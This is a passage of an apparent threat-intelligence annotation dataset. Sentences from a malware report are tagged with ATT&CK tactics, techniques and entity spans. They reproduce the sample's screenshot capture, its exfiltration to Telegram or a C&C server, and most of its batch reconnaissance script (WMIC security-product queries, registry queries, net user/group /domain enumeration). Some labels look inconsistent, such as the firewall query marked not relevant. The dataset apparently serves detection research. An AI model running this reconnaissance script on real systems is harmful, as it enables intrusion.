"source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 147, "context_before": "The JPEG settings can be configured by the threat actor in the request as discussed above.", "sentence_text": "Screenshots are taken using the Windows APIs and written to disk in the covert store with the name APPX.%x%x%x%x%x.tmp, where each %x is a random value.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1113", "name": "Screen Capture" } ], "procedure": "Captures screenshots using Windows APIs to random temporary files", "entities": [ { "text": "Screenshots are taken using the Windows APIs", "start": 0, "end": 44, "label": "Action" }, { "text": "written to disk", "start": 49, "end": 64, "label": "Action" }, { "text": "covert store", "start": 72, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "APPX.%x%x%x%x%x.tmp", "start": 99, "end": 118, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s148-8ff3fd", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 148, "context_before": "Screenshots are taken using the Windows APIs and written to disk in the covert store with the name APPX.%x%x%x%x%x.tmp, where each %x is a random value.", "sentence_text": "The output value is then either uploaded to Telegram or the C&C server using command 41.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Exfiltrates collected data via command 41 to Telegram or C2 server", "entities": [ { "text": "uploaded to Telegram or the C&C server", "start": 32, "end": 70, "label": "Action" }, { "text": "Telegram", "start": 44, "end": 52, "label": "Infrastructure_Indicator" }, { "text": "C&C server", "start": 60, "end": 70, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s149-307828", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 149, "context_before": "The output value is then either uploaded to Telegram or the C&C server using command 41.", "sentence_text": "Sys info commands @echo off @CHCP 65001 @set t=\"%cd%\\ni\" @set f=\"%cd%\\i1\" @cd", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Executes system information discovery via batch script", "entities": [ { "text": "Sys info commands @echo off @CHCP 65001 @set t=\"%cd%\\ni\" @set f=\"%cd%\\i1\" @cd", "start": 0, "end": 77, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s150-cf5b5e", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 150, "context_before": "Sys info commands @echo off @CHCP 65001 @set t=\"%cd%\\ni\" @set f=\"%cd%\\i1\" @cd", "sentence_text": "%SystemRoot%\\system32 @echo {{WMIC_AntiVirusProduct}}>%t% @wmic /failfast:on /append:%t% /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1518.001", "name": "Security Software Discovery" } ], "procedure": "Queries antivirus product information via WMIC", "entities": [ { "text": "@echo {{WMIC_AntiVirusProduct}}>%t% ", "start": 22, "end": 58, "label": "Action" }, { "text": "@wmic /failfast:on /append:%t% /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get /value", "start": 58, "end": 155, "label": "Action" }, { "text": "%SystemRoot%\\system32 ", "start": 0, "end": 22, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-96_mitre_report-p1-s151-58cf9d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 151, "context_before": "%SystemRoot%\\system32 @echo {{WMIC_AntiVirusProduct}}>%t% @wmic /failfast:on /append:%t% /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get /value", "sentence_text": "@echo {{WMIC_AntiSpywareProduct}}>>%t% @wmic /failfast:on /append:%t% /namespace:\\\\root\\SecurityCenter2 path AntiSpywareProduct get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1518.001", "name": "Security Software Discovery" } ], "procedure": "Queries anti-spyware product information via WMIC", "entities": [ { "text": "@echo {{WMIC_AntiSpywareProduct}}>>%t% ", "start": 0, "end": 39, "label": "Action" }, { "text": "@wmic /failfast:on /append:%t% /namespace:\\\\root\\SecurityCenter2 path AntiSpywareProduct get /value", "start": 39, "end": 138, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s152-68aa64", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 152, "context_before": "@echo {{WMIC_AntiSpywareProduct}}>>%t% @wmic /failfast:on /append:%t% /namespace:\\\\root\\SecurityCenter2 path AntiSpywareProduct get /value", "sentence_text": "@echo {{WMIC_FirewallProduct}}>>%t% @wmic /failfast:on /append:%t% /namespace:\\\\root\\SecurityCenter2 path FirewallProduct get /value", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s153-f3f85d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 153, "context_before": "@echo {{WMIC_FirewallProduct}}>>%t% @wmic /failfast:on /append:%t% /namespace:\\\\root\\SecurityCenter2 path FirewallProduct get /value", "sentence_text": "@echo {{WMIC_OS}}>>%t% @wmic /failfast:on /append:%t%", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries operating system information via WMIC", "entities": [ { "text": "@echo {{WMIC_OS}}>>%t%", "start": 0, "end": 22, "label": "Action" }, { "text": "@wmic /failfast:on /append:%t%", "start": 23, "end": 53, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s154-f50fa7", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 154, "context_before": "@echo {{WMIC_OS}}>>%t% @wmic /failfast:on /append:%t%", "sentence_text": "OS get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Retrieves detailed OS configuration via WMIC", "entities": [ { "text": "OS get /value", "start": 0, "end": 13, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s155-9f78c6", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 155, "context_before": "OS get /value", "sentence_text": "@echo {{WMIC_TIMEZONE}}>>%t% @wmic /failfast:on /append:%t% TIMEZONE get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries system timezone information via WMIC", "entities": [ { "text": "@echo {{WMIC_TIMEZONE}}>>%t%", "start": 0, "end": 28, "label": "Action" }, { "text": "@wmic /failfast:on /append:%t% TIMEZONE get /value", "start": 29, "end": 79, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s156-77f7dc", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 156, "context_before": "@echo {{WMIC_TIMEZONE}}>>%t% @wmic /failfast:on /append:%t% TIMEZONE get /value", "sentence_text": "@echo {{WMIC_LOGON}}>>%t% @wmic /failfast:on /append:%t%", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1033", "name": "System Owner/User Discovery" } ], "procedure": "Queries user logon information via WMIC", "entities": [ { "text": "@echo {{WMIC_LOGON}}>>%t% @wmic /failfast:on /append:%t%", "start": 0, "end": 56, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s158-c2d20d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 158, "context_before": "LOGON", "sentence_text": "get /value", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s159-b9ec1e", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 159, "context_before": "get /value", "sentence_text": "@echo {{WMIC_DESKTOP}}>>%t% @wmic /failfast:on /append:%t% DESKTOP get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries desktop configuration information via WMIC", "entities": [ { "text": "@echo {{WMIC_DESKTOP}}>>%t% @wmic /failfast:on /append:%t% DESKTOP get /value", "start": 0, "end": 77, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s160-70b3d9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 160, "context_before": "@echo {{WMIC_DESKTOP}}>>%t% @wmic /failfast:on /append:%t% DESKTOP get /value", "sentence_text": "@echo {{WMIC_DESKTOPMONITOR}}>>%t% @wmic /failfast:on /append:%t%", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries desktop monitor information via WMIC", "entities": [ { "text": "@echo {{WMIC_DESKTOPMONITOR}}>>%t% @wmic /failfast:on /append:%t%", "start": 0, "end": 65, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s161-f32781", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 161, "context_before": "@echo {{WMIC_DESKTOPMONITOR}}>>%t% @wmic /failfast:on /append:%t%", "sentence_text": "DESKTOPMONITOR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s162-233633", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 162, "context_before": "DESKTOPMONITOR", "sentence_text": "get /value", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s163-8230f4", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 163, "context_before": "get /value", "sentence_text": "@echo {{WMIC_BASEBOARD}}>>%t% @wmic /failfast:on /append:%t% BASEBOARD get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries baseboard/hardware information via WMIC", "entities": [ { "text": "@echo {{WMIC_BASEBOARD}}>>%t% @wmic /failfast:on /append:%t% BASEBOARD get /value", "start": 0, "end": 81, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s164-255763", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 164, "context_before": "@echo {{WMIC_BASEBOARD}}>>%t% @wmic /failfast:on /append:%t% BASEBOARD get /value", "sentence_text": "@echo {{WMIC_BIOS}}>>%t% @wmic /failfast:on /append:%t% BIOS get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries BIOS information via WMIC", "entities": [ { "text": "@echo {{WMIC_BIOS}}>>%t% @wmic /failfast:on /append:%t% BIOS get /value", "start": 0, "end": 71, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s165-cf82cf", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 165, "context_before": "@echo {{WMIC_BIOS}}>>%t% @wmic /failfast:on /append:%t% BIOS get /value", "sentence_text": "@echo {{WMIC_CPU}}>>%t% @wmic /failfast:on /append:%t% CPU get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries CPU information via WMIC", "entities": [ { "text": "@echo {{WMIC_CPU}}>>%t% @wmic /failfast:on /append:%t% CPU get /value", "start": 0, "end": 69, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s166-069c0e", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 166, "context_before": "@echo {{WMIC_CPU}}>>%t% @wmic /failfast:on /append:%t% CPU get /value", "sentence_text": "@echo {{WMIC_SOUNDDEV}}>>%t% @wmic /failfast:on /append:%t% SOUNDDEV get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries sound device information via WMIC", "entities": [ { "text": "@echo {{WMIC_SOUNDDEV}}>>%t% @wmic /failfast:on /append:%t% SOUNDDEV get /value", "start": 0, "end": 79, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s167-00c4a9", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 167, "context_before": "@echo {{WMIC_SOUNDDEV}}>>%t% @wmic /failfast:on /append:%t% SOUNDDEV get /value", "sentence_text": "@echo {{WMIC_LOGICALDISK}}>>%t% @wmic /failfast:on /append:%t%", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries logical disk information via WMIC", "entities": [ { "text": "@echo {{WMIC_LOGICALDISK}}>>%t% @wmic /failfast:on /append:%t%", "start": 0, "end": 62, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s168-1719ab", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 168, "context_before": "@echo {{WMIC_LOGICALDISK}}>>%t% @wmic /failfast:on /append:%t%", "sentence_text": "LOGICALDISK get /value", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s169-21fa07", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 169, "context_before": "LOGICALDISK get /value", "sentence_text": "@echo {{WMIC_CDROM}}>>%t% @wmic /failfast:on /append:%t% CDROM get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries CD-ROM drive information via WMIC", "entities": [ { "text": "@echo {{WMIC_CDROM}}>>%t% @wmic /failfast:on /append:%t% CDROM get /value", "start": 0, "end": 73, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s170-78a3eb", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 170, "context_before": "@echo {{WMIC_CDROM}}>>%t% @wmic /failfast:on /append:%t% CDROM get /value", "sentence_text": "@echo {{WMIC_PRINTERCONFIG}}>>%t% @wmic /failfast:on /append:%t%", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries printer configuration information via WMIC", "entities": [ { "text": "@echo {{WMIC_PRINTERCONFIG}}>>%t% @wmic /failfast:on /append:%t%", "start": 0, "end": 64, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s171-01ac2d", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 171, "context_before": "@echo {{WMIC_PRINTERCONFIG}}>>%t% @wmic /failfast:on /append:%t%", "sentence_text": "PRINTERCONFIG get /value", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s172-055a75", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 172, "context_before": "PRINTERCONFIG get /value", "sentence_text": "@echo {{WMIC_USERACCOUNT}}>>%t% @wmic /failfast:on /append:%t% USERACCOUNT get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1087.002", "name": "Domain Account" } ], "procedure": "Queries user account information via WMIC", "entities": [ { "text": "@echo {{WMIC_USERACCOUNT}}>>%t% @wmic /failfast:on /append:%t% USERACCOUNT get /value", "start": 0, "end": 85, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s173-17ad51", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 173, "context_before": "@echo {{WMIC_USERACCOUNT}}>>%t% @wmic /failfast:on /append:%t% USERACCOUNT get /value", "sentence_text": "@echo {{WMIC_SHARE}}>>%t% @wmic /failfast:on /append:%t% SHARE get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1135", "name": "Network Share Discovery" } ], "procedure": "Queries network share information via WMIC", "entities": [ { "text": "@echo {{WMIC_SHARE}}>>%t% @wmic /failfast:on /append:%t% SHARE get /value", "start": 0, "end": 73, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s174-b91511", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 174, "context_before": "@echo {{WMIC_SHARE}}>>%t% @wmic /failfast:on /append:%t% SHARE get /value", "sentence_text": "@echo {{WMIC_STARTUP}}>>%t% @wmic /failfast:on /append:%t% STARTUP get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "Queries startup program information via WMIC", "entities": [ { "text": "@echo {{WMIC_STARTUP}}>>%t% @wmic /failfast:on /append:%t% STARTUP get /value", "start": 0, "end": 77, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s175-588d9c", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 175, "context_before": "@echo {{WMIC_STARTUP}}>>%t% @wmic /failfast:on /append:%t% STARTUP get /value", "sentence_text": "@echo {{WMIC_PROCESS}}>>%t% @wmic /failfast:on /append:%t% PROCESS get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Queries running process information via WMIC", "entities": [ { "text": "@echo {{WMIC_PROCESS}}>>%t% @wmic /failfast:on /append:%t% PROCESS get /value", "start": 0, "end": 77, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s176-a74eac", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 176, "context_before": "@echo {{WMIC_PROCESS}}>>%t% @wmic /failfast:on /append:%t% PROCESS get /value", "sentence_text": "@echo {{WMIC_SERVICE}}>>%t% @wmic /failfast:on /append:%t% SERVICE get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1007", "name": "System Service Discovery" } ], "procedure": "Queries service information via WMIC", "entities": [ { "text": "@echo {{WMIC_SERVICE}}>>%t% @wmic /failfast:on /append:%t% SERVICE get /value", "start": 0, "end": 77, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s177-402a7f", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 177, "context_before": "@echo {{WMIC_SERVICE}}>>%t% @wmic /failfast:on /append:%t% SERVICE get /value", "sentence_text": "@echo {{WMIC_SYSDRIVER}}>>%t% @wmic /failfast:on /append:%t%", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries system driver information via WMIC", "entities": [ { "text": "@echo {{WMIC_SYSDRIVER}}>>%t% @wmic /failfast:on /append:%t%", "start": 0, "end": 60, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s178-7c66da", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 178, "context_before": "@echo {{WMIC_SYSDRIVER}}>>%t% @wmic /failfast:on /append:%t%", "sentence_text": "SYSDRIVER get /value", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s179-bbf788", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 179, "context_before": "SYSDRIVER get /value", "sentence_text": "@echo {{WMIC_PAGEFILE}}>>%t% @wmic /failfast:on /append:%t% PAGEFILE get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries pagefile configuration via WMIC", "entities": [ { "text": "@echo {{WMIC_PAGEFILE}}>>%t% @wmic /failfast:on /append:%t% PAGEFILE get /value", "start": 0, "end": 79, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s180-72ace3", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 180, "context_before": "@echo {{WMIC_PAGEFILE}}>>%t% @wmic /failfast:on /append:%t% PAGEFILE get /value", "sentence_text": "@echo {{WMIC_PAGEFILE}}>>%t% @wmic /failfast:on /append:%t% PAGEFILE get /value", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Queries pagefile configuration via WMIC", "entities": [ { "text": "@echo {{WMIC_PAGEFILE}}>>%t% @wmic /failfast:on /append:%t% PAGEFILE get /value", "start": 0, "end": 79, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s181-409fa3", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 181, "context_before": "@echo {{WMIC_PAGEFILE}}>>%t% @wmic /failfast:on /append:%t% PAGEFILE get /value", "sentence_text": "@echo {{SYSTEMINFO}}>>%t% @SYSTEMINFO>>%t% @echo {{Reg_Uninstall}}>>%t% @REG QUERY \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"  /s>>%t% @echo {{Reg_TerminalServerClient}}>>%t% @REG QUERY \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"  /s>>%t%", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1012", "name": "Query Registry" } ], "procedure": "Executes comprehensive system reconnaissance via multiple commands", "entities": [ { "text": "@echo {{SYSTEMINFO}}>>%t%", "start": 0, "end": 25, "label": "Action" }, { "text": "@SYSTEMINFO>>%t%", "start": 26, "end": 42, "label": "Action" }, { "text": "@echo {{Reg_Uninstall}}>>%t% ", "start": 43, "end": 72, "label": "Action" }, { "text": "@REG QUERY \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"  /s>>%t%", "start": 72, "end": 150, "label": "Action" }, { "text": "@echo {{Reg_TerminalServerClient}}>>%t%", "start": 151, "end": 190, "label": "Action" }, { "text": "@REG QUERY \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"  /s>>%t%", "start": 191, "end": 280, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s182-f196de", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 182, "context_before": "@echo {{SYSTEMINFO}}>>%t% @SYSTEMINFO>>%t% @echo {{Reg_Uninstall}}>>%t% @REG QUERY \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"  /s>>%t% @echo {{Reg_TerminalServerClient}}>>%t% @REG QUERY \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"  /s>>%t%", "sentence_text": "@echo {{BOOTCFG}}>>%t% @BOOTCFG>>%t% @echo {{IPCONFIG/All}}>>%t% @IPCONFIG /ALL>>%t% @echo {{whoami}}>>%t% @whoami>>%t% @echo {{net user /domain}}>>%t% @net user /domain>>%t% @echo {{net user}}>>%t% @net user>>%t% @echo {{net user Administrator}}>>%t% @net user Administrator>>%t% @echo {{net localgroup administrators}}>>%t% @net localgroup administrators>>%t% @echo {{net group /domain }}>>%t% @net group /domain>>%t% @echo {{net group \"domain admins\" /domain}}>>%t% @net group \"domain admins\" /domain>>%t% @echo {{net view}}>>%t% @net view>>%t% @echo {{net use}}>>%t% @net use>>%t% @echo {{net share}}>>%t% @net share>>%t% @echo {{route print}}>>%t% @route print>>%t% @echo {{net localgroup}}>>%t% @net localgroup>>%t% @echo {{net group \"Exchange Trusted Subsystem\" /domain}}>>%t% @net group \"Exchange Trusted Subsystem\" /domain>>%t%", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1018", "name": "Remote System Discovery" } ], "procedure": "Performs comprehensive system and network reconnaissance via multiple commands", "entities": [ { "text": "@echo {{BOOTCFG}}>>%t% @BOOTCFG>>%t% @echo {{IPCONFIG/All}}>>%t% @IPCONFIG /ALL>>%t% @echo {{whoami}}>>%t% @whoami>>%t% @echo {{net user /domain}}>>%t% @net user /domain>>%t% @echo {{net user}}>>%t% @net user>>%t% @echo {{net user Administrator}}>>%t% @net user Administrator>>%t% @echo {{net localgroup administrators}}>>%t% @net localgroup administrators>>%t% @echo {{net group /domain }}>>%t% @net group /domain>>%t% @echo {{net group \"domain admins\" /domain}}>>%t% @net group \"domain admins\" /domain>>%t% @echo {{net view}}>>%t% @net view>>%t% @echo {{net use}}>>%t% @net use>>%t% @echo {{net share}}>>%t% @net share>>%t% @echo {{route print}}>>%t% @route print>>%t% @echo {{net localgroup}}>>%t% @net localgroup>>%t% @echo {{net group \"Exchange Trusted Subsystem\" /domain}}>>%t% @net group \"Exchange Trusted Subsystem\" /domain>>%t%", "start": 0, "end": 836, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s183-4153e4", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 183, "context_before": "@echo {{BOOTCFG}}>>%t% @BOOTCFG>>%t% @echo {{IPCONFIG/All}}>>%t% @IPCONFIG /ALL>>%t% @echo {{whoami}}>>%t% @whoami>>%t% @echo {{net user /domain}}>>%t% @net user /domain>>%t% @echo {{net user}}>>%t% @net user>>%t% @echo {{net user Administrator}}>>%t% @net user Administrator>>%t% @echo {{net localgroup administrators}}>>%t% @net localgroup administrators>>%t% @echo {{net group /domain }}>>%t% @net group /domain>>%t% @echo {{net group \"domain admins\" /domain}}>>%t% @net group \"domain admins\" /domain>>%t% @echo {{net view}}>>%t% @net view>>%t% @echo {{net use}}>>%t% @net use>>%t% @echo {{net share}}>>%t% @net share>>%t% @echo {{route print}}>>%t% @route print>>%t% @echo {{net localgroup}}>>%t% @net localgroup>>%t% @echo {{net group \"Exchange Trusted Subsystem\" /domain}}>>%t% @net group \"Exchange Trusted Subsystem\" /domain>>%t%", "sentence_text": "@echo {{net accounts /domain}}>>%t% @net accounts /domain>>%t% @echo {{net accounts}}>>%t% @net accounts>>%t% @echo {{netstat -an}}>>%t% @netstat -an>>%t% @echo {{set}}>>%t% @set>>%t% @echo {{tasklist}}>>%t% @tasklist>>%t% @echo {{dir c:\\ }}>>%t% @dir c:\\ >>%t% @echo {{dir d:\\ }}>>%t% @dir d:\\ >>%t% @echo {{dir e:\\ }}>>%t% @dir e:\\ >>%t% @echo {{dir f:\\}}>>%t% @dir f:\\>>%t% @echo {{dir g:\\}}>>%t% @dir", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Performs comprehensive system enumeration via multiple discovery commands", "entities": [ { "text": "@echo {{net accounts /domain}}>>%t% @net accounts /domain>>%t% @echo {{net accounts}}>>%t% @net accounts>>%t% @echo {{netstat -an}}>>%t% @netstat -an>>%t% @echo {{set}}>>%t% @set>>%t% @echo {{tasklist}}>>%t% @tasklist>>%t% @echo {{dir c:\\ }}>>%t% @dir c:\\ >>%t% @echo {{dir d:\\ }}>>%t% @dir d:\\ >>%t% @echo {{dir e:\\ }}>>%t% @dir e:\\ >>%t% @echo {{dir f:\\}}>>%t% @dir f:\\>>%t% @echo {{dir g:\\}}>>%t% @dir", "start": 0, "end": 404, "label": "Action" } ] }, { "uid": "mitre-96_mitre_report-p1-s184-38e607", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 184, "context_before": "@echo {{net accounts /domain}}>>%t% @net accounts /domain>>%t% @echo {{net accounts}}>>%t% @net accounts>>%t% @echo {{netstat -an}}>>%t% @netstat -an>>%t% @echo {{set}}>>%t% @set>>%t% @echo {{tasklist}}>>%t% @tasklist>>%t% @echo {{dir c:\\ }}>>%t% @dir c:\\ >>%t% @echo {{dir d:\\ }}>>%t% @dir d:\\ >>%t% @echo {{dir e:\\ }}>>%t% @dir e:\\ >>%t% @echo {{dir f:\\}}>>%t% @dir f:\\>>%t% @echo {{dir g:\\}}>>%t% @dir", "sentence_text": "g:\\>>%t% @echo {{dir Desktop}}>>%t% @dir %appdata%\\..\\..\\Desktop>>%t% @echo {{dir C:\\Users}}>>%t% @dir C:\\Users>>%t% @echo {{dir \"C:\\Program Files\"}}>>%t% @dir \"C:\\Program Files\">>%t% @echo {{dir \"C:\\Program Files (x86)\"}}>>%t% @dir \"C:\\Program Files (x86)\">>%t% @echo {{dir C:\\ProgramData}}>>%t% @dir C:\\ProgramData>>%t% @echo {{tracert -d -4 -w 1500 8.8.8.8}}>>%t% @tracert -d -4 -w 1500 8.8.8.8>>%t% @echo {{ping 8.8.8.8}}>>%t% @ping 8.8.8.8>>%t% @echo {{ping gitlab.com}}>>%t% @ping gitlab.com>>%t%", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-96_mitre_report-p1-s185-24f28c", "source": "mitre", "doc_id": "96_mitre_report", "page_number": 1, "sentence_id": 185, "context_before": "g:\\>>%t% @echo {{dir Desktop}}>>%t% @dir %appdata%\\..\\..\\Desktop>>%t% @echo {{dir C:\\Users}}>>%t% @dir C:\\Users>>%t% @echo {{dir \"C:\\Program Files\"}}>>%t% @dir \"C:\\Program Files\">>%t% @echo {{dir \"C:\\Program Files (x86)\"}}>>%t% @dir \"C:\\Program Files (x86)\">>%t% @echo {{dir C:\\ProgramData}}>>%t% @dir C:\\ProgramData>>%t% @echo {{tracert -d -4 -w 1500 8.8.8.8}}>>%t% @tracert -d -4 -w 1500 8.8.8.8>>%t% @echo {{ping 